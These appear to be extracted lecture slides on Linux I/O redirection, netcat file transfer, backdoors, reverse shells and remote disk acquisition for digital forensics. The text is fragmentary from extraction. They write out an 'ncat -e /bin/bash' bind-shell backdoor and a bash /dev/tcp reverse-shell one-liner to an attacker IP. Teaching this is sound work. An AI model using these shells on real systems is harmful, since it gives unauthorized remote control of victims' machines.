Advanced Linux

Commands
Remote File/Disk Acquisition
Outline
• Standard input/output/error devices
• Network utilities use standard devices
• Create a backdoor at Windows 10/Remote File Acquisition
• Reverse shell
• Remote disk acquisition
 Standard
input/output/error
devices
Input and output devices are files
(0,1,2)!
FILE_DESCRIPTOR 0,1,2

0< input Keyboard/file

Process 1> output

Display/file

2> err output

4
Standard input: stdin

0< input

cat

Display the content of a file

1. tell cat to take input from myfile.txt directly
2. Send the myflle.txt content to the input device (0), tell cat to take input from the device,
3. Same as 2 (0 is a default input device)
Standard output: stdout
default input and output

1> output
echo

0< input

6
Another example

7
Standard error: stderr

2> err

cat

Save error messages to a file error.txt as

the system can’t find foo.txt
 Network utilities use
standard devices

9
ChattingBy default, netcat uses the TCP (Transmission Control Protocol) protocol
By default, netcat does not save the incoming data
to a file; it simply outputs the received data to the
terminal (stdout 1)
Forensic Data Transfer

step 1: listen

step 2: sent to listener’s input device 0

step 3: stop the process

11
 Your work

12
Goal : Communication between two
machines
Goal
• Send files from Kali to Windows 10
• Solution
• Use Zenmap
• netcat is integrated into Zenmap
15
This slide: send a file from Linux to Win
Your homework is: sent a file from Win to Linux

16
 Create a backdoor at Window
10/Remote File Acquisition

17
Same Goal
• Attack: Remote access a victim’s PC
• Digital Forensic: Remote evidence acquisition
Backdoor background
2. Send a signal to
1. Let a victim listen to
activate the
a hidden
communication
communication
channel
channel (backdoor)
std input
tcp
puts input
receive output
std output
Server
/ Victim
tcp Client
/ Attacker
 Start Client second
Start listener first

Server listens port 8080.

-e: program to execute after
connection occurs, connecting
STDIN and STDOUT to the
program
cmd.exe: a shell command for
Windows

ncat -l 10000 -e /bin/bash //if create a backdoor in Linux

 Reverse Shell
A new type of backdoor

21
Motivation
• Normal backdoor at victim’s PC needs to
be activate by the attacker
• Victim can setup a firewall to block the
income connecting request
 How to bypass firewall?
• Firewall doesn’t block signals sent from
victims
• Let the victim sends the signal
• Let the attacker listen to the signal
Reverse shell

Think of it like a phone call in reverse. Instead of you calling

someone else, the remote computer is calling the attacker's
computer, and the attacker is able to answer the call and take
control.

23
 Reverse shell definition
• Reverse shell is getting the connection
from the victim or target to your computer

24
Reverse shell demo
2. listen to a hidden
1. Let a victim Send a
communication
signal to activate the
channel
communication
channel
std input
tcp
puts input
receive output
std output
Client
/ Victim
tcp Server
/ Attacker

Reverse shell
 Victim sends signals
Attacker listens port
8080 first

-e: program to execute after

connection occurs., connecting
STDIN and STDOUT to the
program
cmd.exe: a shell command for
Windows

ncat -l 10000 -e /bin/bash //if create a backdoor in Linux

Remote Disk Acquisition
Demo only
Remote disk acquisition scenario
Must be in the same network

dd command

ncat: https://nmap.org/download nc
dd: http://www.chrysocome.net/downloads/dd-0.5.zip
 Do you have enough disk space in
Linux to save the acquired Windows
image?
Check both Linux and Windows disk space
Remote disk acquisition: Linux
Waiting for the disk image file
Remote disk
acquisition:
Windows partitions
Locate C: drive

Locate
partitions

\\?\Device\Harddisk0\Partition0
Remote disk acquisition: Windows
Acquire Windows disk partition 0 and transfer to Linux

make sure download dd

Verify that Linux is receiving the disk image

receiving disk image data

Acquire Windows disk partition 0 and transfer to Linux (Alternative disk
with a different block size)
Issue: Remote disk acquisition is
slow
• The optimal block size (bs value) depends on various factors
• Type of storage
• I/O patterns
• System characteristics.
• Solution
• Experimentation to find the best value
• The best solution (only works when using dd in Linux)
• Write a script to automate the experiments
Auto speed testing (only dd in
Linux)
Download the speeding test shell script
Change it to executable and verify test shell script
Find the optimized block size

optimized bytes
We have to manually try optimized
block size
 Summary
• There are two places programs send output to:
Standard output (stdout) and Standard Error (stderr);
• You can redirect these outputs to a different place
(like a file);
• File descriptors are used to identify stdout (1) and
stderr (2);
• command > output is just a shortcut for command
1> output;
• You can use &[FILE_DESCRIPTOR] to reference a file
descriptor value;
• Using 2>&1 will redirect stderr to whatever value is
40
set to stdout (and 1>&2 will do the opposite).
 Summary
• Bind shell - attacker's machine acts as a client and the
victim's machine acts as a server opening up a
communication port on the victim and waiting for the
client to connect to it and then issue commands that
will be remotely (with respect to the attacker)
executed on the victim's machine.
• firewall etc. may block the bind shell

41
 Summary
Reverse Shell - attacker's machine acts as a
server. It opens a communication channel on
a port and waits for incoming connections.
Victim's machine acts as a client and initiates
a connection to the attacker's listening server.
This is exactly what is done by the following:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

42
Assignment
• Create a file in Windows
• name it yourFisrtLastNameEvidence.txt
• the content of the file “hello yourname!”
• You don’t allow to touch Windows directly
after you create the file
• you allow accessing Windows from Kali
• assume nmap is installed
• Remotely acquire the file from Kali
• use command lines, e.g., nc
 https://stackoverflow.com/questions/35271850/what-is-a-reverse-shell

Extra credits: Another approach for

reverse shell

compare difference?

44
Reference
• http://www.learnlinux.org.za/courses/build/shell-scri
pting/ch01s04.html
• https://en.wikipedia.org/wiki/Standard_streams
• https://www.brianstorti.com/understanding-shell-scri
pt-idiom-redirect/
• https://www.computerhope.com/unix/nc.htm
• https://www.sans.org/security-resources/sec560/net
cat_cheat_sheet_v1.pdf
• https://stackoverflow.com/questions/35271850/
what-is-a-reverse-shell